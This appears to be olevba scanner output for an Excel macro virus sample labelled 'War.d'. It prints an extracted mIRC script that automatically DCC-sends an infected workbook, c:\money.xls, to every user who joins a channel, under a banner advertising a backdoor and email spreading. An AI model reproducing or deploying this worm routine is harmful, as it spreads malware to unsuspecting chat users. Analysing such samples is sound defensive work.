olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Virus.MSExcel.War.d-45e2ac88c74b576f1fb1d282f808b1fb861df9ec
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Virus.MSExcel.War.d-45e2ac88c74b576f1fb1d282f808b1fb861df9ec 
in file: Virus.MSExcel.War.d-45e2ac88c74b576f1fb1d282f808b1fb861df9ec - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[script]
n0; AlevirusS>C>S Excel2000>Excel97>BackDoor>Email>MIRC Virus Brasil! 1999!
n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n2=  /dcc send $nick c:\money.xls
n3=}
n4=}
No suspicious keyword or IOC found.

